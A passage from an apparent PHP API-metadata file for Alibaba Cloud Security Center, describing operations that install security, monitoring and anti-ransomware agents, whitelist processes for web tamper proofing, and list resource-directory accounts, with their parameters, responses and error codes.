'云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:IgnoreIdcProbeScanResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"E30282D8-AB2D-5EB1-998B-2DDFA948D49D\\"\\n}","type":"json"}]', ], 'InstallAegisForLingjun' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '257541', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'autoTest' => false, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Uuids', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The list of unique UUIDs for Lingjun bare metal servers.', 'type' => 'array', 'items' => ['description' => 'The unique UUID of a Lingjun bare metal server.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the UUID of the server.', 'type' => 'string', 'required' => false, 'example' => 'inet-8e3fbd56-122c-4011-b692-4d048076****', 'title' => ''], 'required' => false, 'enumValueTitles' => [], 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'InvokeTasks' => [ 'description' => 'The list of installation tasks returned.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuids' => [ 'title' => '', 'description' => 'The list of unique UUIDs for Lingjun bare metal servers.', 'type' => 'array', 'items' => [ 'description' => 'The unique UUID of a Lingjun bare metal server.', 'enumValueTitles' => [], 'type' => 'string', 'example' => 'inet-8e3fbd56-122c-4011-b692-4d048076****', 'title' => '', ], 'example' => '', ], 'InvokeId' => ['title' => '', 'description' => 'The installation task ID for a Lingjun machine.', 'type' => 'string', 'example' => 't-hz05r677e6w****'], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**: The request was successful.'."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. It can be used to troubleshoot issues.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Install Security Center agent on Lingjun bare metal servers', 'summary' => 'Installs the Security Center agent on Lingjun bare metal servers.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'InstallAegisForLingjun'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:InstallAegisForLingjun', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"InvokeTasks\\": [\\n {\\n \\"Uuids\\": [\\n \\"inet-8e3fbd56-122c-4011-b692-4d048076****\\"\\n ],\\n \\"InvokeId\\": \\"t-hz05r677e6w****\\"\\n }\\n ],\\n \\"Success\\": true,\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\"\\n}","type":"json"}]', ], 'InstallBackupClient' => [ 'summary' => 'Installs the anti-ransomware client.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '92320', 'abilityTreeNodes' => ['FEATUREsas7JO011'], ], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server on which you want to install the anti-ransomware client.'."\n" ."\n" .'> > You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this value. UuidList and Uuid cannot both be empty.', 'type' => 'string', 'required' => false, 'example' => 'inet-617eddab-7df4-4a51-b217-a3f59194****', 'title' => ''], ], [ 'name' => 'PolicyVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the mitigation policies. Valid values:'."\n" ."\n" .'- **1.0.0**: The version of the mitigation policies is 1.0.0.'."\n" .'- **2.0.0**: The version of the mitigation policies is 2.0.0.', 'type' => 'string', 'required' => true, 'example' => '2.0.0', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of UUIDs of the servers that you want to protect.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'array', 'items' => ['description' => 'The UUID of the server on which you want to install the anti-ransomware client.'."\n" .'> UuidList and Uuid cannot both be empty.', 'type' => 'string', 'required' => false, 'example' => '3bb30859-b3b5-4f28-868f-b0892c98****', 'title' => ''], 'required' => false, 'example' => '["3bb30859-b3b5-4f28-868f-b0892c98****", "3bb30859-b3b5-4f28-868f-b0892c98****"]', 'maxItems' => 100, 'title' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D0D6E6E4-CB8C-4897-B852-46AEFDA04B21', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'HbrClientUpgrading', 'errorMessage' => 'Client upgrading.', 'description' => ''], ['errorCode' => 'HbrClientHealth', 'errorMessage' => 'client is health. not need reinstall', 'description' => ''], ['errorCode' => 'HbrClientInstalling', 'errorMessage' => 'During client installation, you can refresh the page to view the installation results.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Install anti-ransomware client', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'InstallBackupClient'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:InstallBackupClient', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D0D6E6E4-CB8C-4897-B852-46AEFDA04B21\\"\\n}","type":"json"}]', ], 'InstallCloudMonitor' => [ 'summary' => 'Installs the CloudMonitor agent on a specified server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'ArgusVersion', 'in' => 'query', 'schema' => [ 'title' => '', 'description' => 'The version of the CloudMonitor agent to install. You can obtain the latest CloudMonitor agent version from [Plugin overview](~~183431~~).', 'type' => 'string', 'required' => true, 'enum' => [], 'example' => '3.5.6', ], ], [ 'name' => 'AgentAccessKey', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The AccessKey required to install the CloudMonitor agent. You can call the [DescribeMonitoringAgentAccessKey](~~114948~~) operation to obtain this parameter.'."\n" ."\n" .'> This parameter is required only when you install the CloudMonitor agent on a non-Alibaba Cloud server.', 'type' => 'string', 'required' => false, 'example' => 'usY*****R_U'], ], [ 'name' => 'AgentSecretKey', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The AccessSecret required to install the CloudMonitor agent. You can call the [DescribeMonitoringAgentAccessKey](~~114948~~) operation to obtain this parameter.'."\n" .'> This parameter is required only when you install the CloudMonitor agent on a non-Alibaba Cloud server.', 'type' => 'string', 'required' => false, 'example' => 'UCxF2R1sIO90XlU9****'], ], [ 'name' => 'InstanceIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of instance IDs of the servers on which you want to install the CloudMonitor agent. Separate multiple IDs with commas (,).', 'type' => 'array', 'items' => ['description' => 'The list of instance IDs of the servers on which you want to install the CloudMonitor agent. Separate multiple IDs with commas (,).'."\n" ."\n" .'> You must specify at least one of the InstanceIdList and UuidList parameters for the operation to succeed. If both parameters are specified, the CloudMonitor agent is installed on the union of the servers specified by the two parameters.', 'type' => 'string', 'required' => false, 'example' => '[VMware-564d4e22ce6d9207-c97c8af3a448****,VMware-564d4a9574e0b8ab-843ba10d8b0c****,VMware-564dbb7fddaf27ce-629271166745****]', 'title' => ''], 'required' => false, 'maxItems' => 20, 'minItems' => 0, 'example' => '', ], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of UUIDs of the servers on which you want to install the CloudMonitor agent. Separate multiple UUIDs with commas (,).', 'type' => 'array', 'items' => ['description' => 'The list of UUIDs of the servers on which you want to install the CloudMonitor agent. Separate multiple UUIDs with commas (,).'."\n" .'> You must specify at least one of the InstanceIdList and UuidList parameters for the operation to succeed. If both parameters are specified, the CloudMonitor agent is installed on the union of the servers specified by the two parameters.', 'type' => 'string', 'required' => false, 'example' => '[inet-c669e5d9-0adf-4d71-a9ce-65ed2730****,inet-2e87cce8-763d-4dcd-b39f-d592e1b0****,inet-7c676676-06fa-442e-90fb-b802e5d6****]', 'title' => ''], 'required' => false, 'maxItems' => 20, 'minItems' => 0, 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F92AFB96-FACC-57E7-928E-678D04B94CAE', 'title' => ''], 'Success' => ['description' => 'Indicates whether the operation was successful. Valid values:'."\n" ."\n" .'- **true**: The operation was successful.'."\n" .'- **false**: The operation failed.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'Code' => ['description' => 'The error code returned when the operation failed.', 'type' => 'string', 'example' => 'IllegalParam', 'title' => ''], 'Message' => ['description' => 'The detailed information about the error code.', 'type' => 'string', 'example' => 'There was an error with your request.', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '400', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'MachineNotExist', 'errorMessage' => 'The machine does not exist.', 'description' => ''], ['errorCode' => 'AgentNotOnline', 'errorMessage' => 'The agent not online.', 'description' => ''], ['errorCode' => 'InvalidParam', 'errorMessage' => 'There was an error with your request.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Install cloudMonitor agent', 'description' => '> Before installation, make sure that the Security Center client on your server is online and that your server can access Alibaba Cloud services over the network.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:InstallCloudMonitor', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F92AFB96-FACC-57E7-928E-678D04B94CAE\\",\\n \\"Success\\": false,\\n \\"Code\\": \\"IllegalParam\\",\\n \\"Message\\": \\"There was an error with your request.\\",\\n \\"HttpStatusCode\\": 400\\n}","type":"json"}]', ], 'InstallHybridProxy' => [ 'summary' => 'Installs the Security Center agent on a proxy server in a hybrid cloud.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'YundunUuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the proxy servers.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the proxy server.'."\n", 'type' => 'string', 'required' => false, 'example' => '1b085300-2b3f-4f6c-98d5-f55f38dd14ee', 'title' => ''], 'required' => false, 'maxItems' => 10000, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The cluster name.'."\n", 'type' => 'string', 'required' => false, 'example' => 'proxy-test', 'title' => ''], ], [ 'name' => 'InstallCode', 'in' => 'query', 'schema' => ['description' => 'The installation code.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Z9c8SA', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'E55BE5DB-E2DF-57EB-A0C5-7A85EEA67A4C', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'Illegal parameter', 'errorMessage' => 'illegal parameter', 'description' => ''], ['errorCode' => 'Data not exist', 'errorMessage' => 'Data not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'InstallHybridProxy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'InstallHybridProxy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:InstallHybridProxy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"E55BE5DB-E2DF-57EB-A0C5-7A85EEA67A4C\\"\\n}","type":"json"}]', ], 'InstallPmAgent' => [ 'summary' => 'Installs the CloudMonitor agent on a server that is not deployed on Alibaba Cloud.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '58.35.xx.xx', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The UUID of the server. If you specify multiple UUIDs, separate the UUIDs with commas (,).'."\n", 'type' => 'string', 'required' => true, 'example' => 'inet-a6444920-d303-4ccf-ab87-a1d3cd49****'], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => [ 'title' => '', 'description' => 'The type of the client.'."\n" ."\n" .'* **aliyun_assist**: Cloud Assistant client'."\n" .'* **aliyun_monitor**: CloudMonitor client'."\n", 'type' => 'string', 'required' => true, 'example' => 'aliyun_monitor', 'enum' => ['aliyun_monitor'], ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The returned data.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'D49B5134-9511-5736-B447-BEE0AC66****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D49B5134-9511-5736-B447-BEE0AC66****\\"\\n}","type":"json"}]', 'title' => 'InstallPmAgent', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'InstallPmAgent'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:InstallPmAgent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'InstallUniBackupAgent' => [ 'summary' => 'Installs the anti-ransomware agent for databases.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'PolicyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-ransomware backup policy for databases.'."\n" .'>You can call the [DescribeUniBackupPolicies](~~DescribeUniBackupPolicies~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. China Chinese Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '53ACA55D-0325-5056-A72D-D0EC0B9C****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Install the anti-ransomware agent for databases', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'InstallUniBackupAgent'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:InstallUniBackupAgent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"53ACA55D-0325-5056-A72D-D0EC0B9C****\\"\\n}","type":"json"}]', ], 'JoinWebLockProcessWhiteList' => [ 'summary' => 'Adds processes to the process whitelist of web tamper proofing.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers on which the processes run. Separate multiple UUIDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => '0c1714dc-f7a3-4265-8364-7aa3fce8****,1cc45e7d-7698-4b2c-89d8-e8cba407****', 'title' => ''], ], [ 'name' => 'ProcessPaths', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The paths of the processes.'."\n", 'type' => 'array', 'items' => ['description' => 'The path of the process.'."\n", 'type' => 'string', 'required' => false, 'example' => '/etc/mydata', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'A47D621A-193E-5BDA-ADFA-A0D3133E199C', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A47D621A-193E-5BDA-ADFA-A0D3133E199C\\"\\n}","type":"json"}]', 'title' => 'JoinWebLockProcessWhiteList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'JoinWebLockProcessWhiteList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:JoinWebLockProcessWhiteList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListAccountsInResourceDirectory' => [ 'summary' => 'Retrieves the list of managed accounts for multi-account governance.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92323', 'abilityTreeNodes' => ['FEATUREsasFVYNUW'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => 'B7A839E8-70AE-591D-8D9E-C5419A2240DB', 'title' => ''], 'Accounts' => [ 'description' => 'The list of member accounts in the resource directory.', 'type' => 'array', 'items' => [ 'description' => 'The account details.', 'type' => 'object', 'properties' => [ 'DisplayName' => ['description' => 'The account name.', 'type' => 'string', 'example' => 'abc**', 'title' => ''], 'AccountId' => ['description' => 'The Alibaba Cloud account ID of the member.', 'type' => 'string', 'example' => '180803538814****', 'title' => ''], 'FolderId' => ['description' => 'The ID of the folder in the resource directory.', 'type' => 'string', 'example' => 'fd-cE2SQP****', 'title' => ''], 'SasVersion' => ['description' => 'The purchased edition of Security Center. Valid values:'."\n" ."\n" .'- **0** or **1**: Free Edition'."\n" .'- **2** or **3**: Enterprise Edition '."\n" .'- **5**: Premium Edition '."\n" .'- **6**: Anti-virus Edition '."\n" .'- **7**: Ultimate Edition.', 'type' => 'string', 'example' => '0', 'title' => ''], 'IsMarked' => ['description' => 'Indicates whether the account is marked as followed.', 'type' => 'string', 'example' => 'no', 'title' => ''], 'IsSiemDaAccount' => ['description' => 'Indicates whether the account is a delegated administrator account of Cloud Threat Detection and Response (CTDR). Valid values:'."\n" ."\n" .'- **yes**'."\n" ."\n" .'- **no**.', 'type' => 'string', 'example' => 'no'."\n", 'title' => ''], 'IsSasDaAccount' => ['description' => 'Indicates whether the account is a delegated administrator account of Security Center. Valid values:'."\n" ."\n" .'- **yes**'."\n" ."\n" .'- **no**.', 'type' => 'string', 'example' => 'no', 'title' => ''], 'IsMaAccount' => ['description' => 'Indicates whether the account is the management account of the resource directory. Valid values:'."\n" ."\n" .'- **yes**'."\n" ."\n" .'- **no**.', 'type' => 'string', 'example' => 'no', 'title' => ''], 'SaleInstance' => ['description' => 'The Security Center instance ID.', 'type' => 'string', 'example' => 'postpay-sas-x5x3hy1ly***', 'title' => ''], 'IsSiemControlAccount' => ['description' => 'Indicates whether the account is a management account of Cloud Threat Detection and Response (CTDR). Valid values:'."\n" ."\n" .'- **yes**'."\n" ."\n" .'- **no**.', 'type' => 'string', 'example' => 'no', 'title' => ''], 'ChargeType' => ['description' => 'The subscription billing method. Valid values:'."\n" .'* **0**: upfront'."\n" .'* **1**: pay-as-you-go.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'InstanceBuyType' => ['description' => 'The instance purchase type. Valid values:'."\n" .'- **0**: self-purchased'."\n" .'- **1**: allocated through multi-account management.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'BuySas' => ['description' => 'This parameter is deprecated and does not need to be used.', 'type' => 'integer', 'format' => 'int32', 'deprecated' => true, 'example' => 'true', 'title' => ''], 'PostPayModuleSwitch' => [ 'description' => 'The status of pay-as-you-go module switches, in JsonString format. Valid values:'."\n" .'- Key:'."\n" .' - **VUL**: vulnerability management module'."\n" .' - **CSPM**: Cloud Security Posture Management (CSPM) module'."\n" .' - **AGENTLESS**: agentless detection module'."\n" .' - **SERVERLESS**: serverless asset module'."\n" .' - **CTDR**: Cloud Threat Detection and Response (CTDR) module'."\n" .' - **RASP**: Runtime Application Self-Protection (RASP) module'."\n" .' - **SDK**: malicious file detection SDK module'."\n" .' - **POST_HOST**: host and container security module'."\n" .'- Value: 0 indicates disabled. 1 indicates enabled.', 'enumValueTitles' => ['{\\"AGENTLESS\\":0,\\"CTDR\\":0,\\"CSPM\\":0,\\"SERVERLESS\\":0,\\"RASP\\":0,\\"SDK\\":0,\\"VUL\\":0,\\"POST_HOST\\":0}' => '{\\"AGENTLESS\\":0,\\"CTDR\\":0,\\"CSPM\\":0,\\"SERVERLESS\\":0,\\"RASP\\":0,\\"SDK\\":0,\\"VUL\\":0,\\"POST_HOST\\":0}'], 'type' => 'string', 'example' => '{\\"VUL\\":0}', 'title' => '', ], 'BuySasNew' => ['description' => 'Indicates whether a Security Center subscription instance is purchased. Valid values:'."\n" .'- **true**'."\n" .'- **false**.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'PostBasicService' => ['description' => 'The pay-as-you-go module switch. Valid values:'."\n" .'- **0**: disabled'."\n" .'- **1**: enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query member accounts in a resource directory', 'description' => 'Call this operation by using the management account of the resource directory or the delegated administrator account of Security Center.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAccountsInResourceDirectory'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAccountsInResourceDirectory', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"B7A839E8-70AE-591D-8D9E-C5419A2240DB\\",\\n \\"Accounts\\": [\\n {\\n \\"DisplayName\\": \\"abc**\\",\\n \\"AccountId\\": \\"180803538814****\\",\\n \\"FolderId\\": \\"fd-cE2SQP****\\",\\n \\"SasVersion\\": \\"0\\",\\n \\"IsMarked\\": \\"no\\",\\n \\"IsSiemDaAccount\\": \\"no\\\\n\\",\\n \\"IsSasDaAccount\\": \\"no\\",\\n \\"IsMaAccount\\": \\"no\\",\\n \\"SaleInstance\\": \\"postpay-sas-x5x3hy1ly***\\",\\n \\"IsSiemControlAccount\\": \\"no\\",\\n \\"ChargeType\\": 1,\\n \\"InstanceBuyType\\": 0,\\n \\"BuySas\\": 0,\\n \\"PostPayModuleSwitch\\": \\"{\\\\\\\\\\\\\\"VUL\\\\\\\\\\\\\\":0}\\",\\n \\"BuySasNew\\": true,\\n \\"PostBasicService\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'ListAegisContainerPluginRule' => [ 'summary' => 'Query user configurations.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 